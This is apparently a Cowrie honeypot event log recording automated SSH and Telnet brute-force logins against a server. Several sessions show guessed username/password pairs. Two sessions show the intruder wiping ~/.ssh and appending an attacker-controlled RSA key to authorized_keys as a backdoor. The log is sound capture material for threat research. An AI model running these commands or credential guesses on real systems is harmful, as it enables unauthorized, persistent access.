{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":57636,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f7919050ec4","protocol":"ssh","message":"New connection: 157.20.207.165:57636 (1.2.3.4:22) [session: 1f7919050ec4]","sensor":"my-vps","timestamp":"2025-09-09T06:31:29.814394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:31:29.815100Z","src_ip":"157.20.207.165","session":"1f7919050ec4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:31:29.998837Z","src_ip":"157.20.207.165","session":"1f7919050ec4"}
{"eventid":"cowrie.login.failed","username":"muhamad","password":"muhamad2025","message":"login attempt [muhamad/muhamad2025] failed","sensor":"my-vps","timestamp":"2025-09-09T06:31:30.774215Z","src_ip":"157.20.207.165","session":"1f7919050ec4"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:31:31.960395Z","src_ip":"157.20.207.165","session":"1f7919050ec4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59222,"dst_ip":"1.2.3.4","dst_port":23,"session":"125be1aeadb1","protocol":"telnet","message":"New connection: 212.227.235.229:59222 (1.2.3.4:23) [session: 125be1aeadb1]","sensor":"my-vps","timestamp":"2025-09-09T06:31:36.458403Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:31:36.670595Z","src_ip":"212.227.235.229","session":"125be1aeadb1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:31:36.724152Z","src_ip":"212.227.235.229","session":"125be1aeadb1"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-09T06:31:36.725218Z","src_ip":"212.227.235.229","session":"125be1aeadb1"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-09T06:31:36.725922Z","src_ip":"212.227.235.229","session":"125be1aeadb1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54507,"dst_ip":"1.2.3.4","dst_port":22,"session":"23472af8fa0a","protocol":"ssh","message":"New connection: 212.227.235.229:54507 (1.2.3.4:22) [session: 23472af8fa0a]","sensor":"my-vps","timestamp":"2025-09-09T06:31:39.137065Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:31:39.138167Z","src_ip":"212.227.235.229","session":"23472af8fa0a"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:31:39.648761Z","src_ip":"212.227.235.229","session":"23472af8fa0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45556,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fd7c38b4c2c","protocol":"ssh","message":"New connection: 212.227.235.229:45556 (1.2.3.4:22) [session: 3fd7c38b4c2c]","sensor":"my-vps","timestamp":"2025-09-09T06:31:40.533157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:31:40.534059Z","src_ip":"212.227.235.229","session":"3fd7c38b4c2c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:31:40.600163Z","src_ip":"212.227.235.229","session":"3fd7c38b4c2c"}
{"eventid":"cowrie.login.success","username":"root","password":"admin1","message":"login attempt [root/admin1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:31:40.905217Z","src_ip":"212.227.235.229","session":"3fd7c38b4c2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:31:41.096043Z","src_ip":"212.227.235.229","session":"3fd7c38b4c2c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:31:41.096719Z","src_ip":"212.227.235.229","session":"3fd7c38b4c2c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:31:41.097710Z","src_ip":"212.227.235.229","session":"3fd7c38b4c2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:31:41.163444Z","src_ip":"212.227.235.229","session":"3fd7c38b4c2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:31:41.309177Z","src_ip":"212.227.235.229","session":"3fd7c38b4c2c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:31:41.309905Z","src_ip":"212.227.235.229","session":"3fd7c38b4c2c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:31:41.377711Z","src_ip":"212.227.235.229","session":"3fd7c38b4c2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:31:41.378522Z","src_ip":"212.227.235.229","session":"3fd7c38b4c2c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45638,"dst_ip":"1.2.3.4","dst_port":22,"session":"49e992b9b02d","protocol":"ssh","message":"New connection: 212.227.235.229:45638 (1.2.3.4:22) [session: 49e992b9b02d]","sensor":"my-vps","timestamp":"2025-09-09T06:31:41.481697Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:31:41.482432Z","src_ip":"212.227.235.229","session":"49e992b9b02d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:31:41.566806Z","src_ip":"212.227.235.229","session":"49e992b9b02d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:31:41.948253Z","src_ip":"212.227.235.229","session":"49e992b9b02d"}
{"eventid":"cowrie.login.failed","username":"user","password":"qwerty123","message":"login attempt [user/qwerty123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:31:42.180771Z","src_ip":"212.227.235.229","session":"23472af8fa0a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:31:43.034070Z","src_ip":"212.227.235.229","session":"49e992b9b02d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45855,"dst_ip":"1.2.3.4","dst_port":22,"session":"324d4f2f1d95","protocol":"ssh","message":"New connection: 212.227.235.229:45855 (1.2.3.4:22) [session: 324d4f2f1d95]","sensor":"my-vps","timestamp":"2025-09-09T06:31:43.118742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:31:43.119680Z","src_ip":"212.227.235.229","session":"324d4f2f1d95"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:31:43.204055Z","src_ip":"212.227.235.229","session":"324d4f2f1d95"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:31:43.566424Z","src_ip":"212.227.235.229","session":"23472af8fa0a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:31:43.586934Z","src_ip":"212.227.235.229","session":"324d4f2f1d95"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:31:43.653611Z","src_ip":"212.227.235.229","session":"3fd7c38b4c2c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:31:43.672719Z","src_ip":"212.227.235.229","session":"324d4f2f1d95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57736,"dst_ip":"1.2.3.4","dst_port":22,"session":"33d627bfba49","protocol":"ssh","message":"New connection: 212.227.235.229:57736 (1.2.3.4:22) [session: 33d627bfba49]","sensor":"my-vps","timestamp":"2025-09-09T06:32:00.872739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:32:00.875096Z","src_ip":"212.227.235.229","session":"33d627bfba49"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:32:01.227210Z","src_ip":"212.227.235.229","session":"33d627bfba49"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":46160,"dst_ip":"1.2.3.4","dst_port":22,"session":"72914df1b78f","protocol":"ssh","message":"New connection: 118.26.39.178:46160 (1.2.3.4:22) [session: 72914df1b78f]","sensor":"my-vps","timestamp":"2025-09-09T06:32:01.869884Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:32:01.870621Z","src_ip":"118.26.39.178","session":"72914df1b78f"}
{"eventid":"cowrie.login.success","username":"root","password":"Qa741852","message":"login attempt [root/Qa741852] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:32:02.679585Z","src_ip":"212.227.235.229","session":"33d627bfba49"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:32:02.896950Z","src_ip":"118.26.39.178","session":"72914df1b78f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:32:03.512969Z","src_ip":"212.227.235.229","session":"33d627bfba49"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:32:03.513656Z","src_ip":"212.227.235.229","session":"33d627bfba49"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:32:03.514792Z","src_ip":"212.227.235.229","session":"33d627bfba49"}
{"eventid":"cowrie.login.failed","username":"samsung","password":"Password1","message":"login attempt [samsung/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T06:32:03.516850Z","src_ip":"118.26.39.178","session":"72914df1b78f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:04.246248Z","src_ip":"212.227.235.229","session":"33d627bfba49"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:32:04.624503Z","src_ip":"212.227.235.229","session":"33d627bfba49"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:32:04.625222Z","src_ip":"212.227.235.229","session":"33d627bfba49"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:32:04.721244Z","src_ip":"118.26.39.178","session":"72914df1b78f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:32:04.987043Z","src_ip":"212.227.235.229","session":"33d627bfba49"}
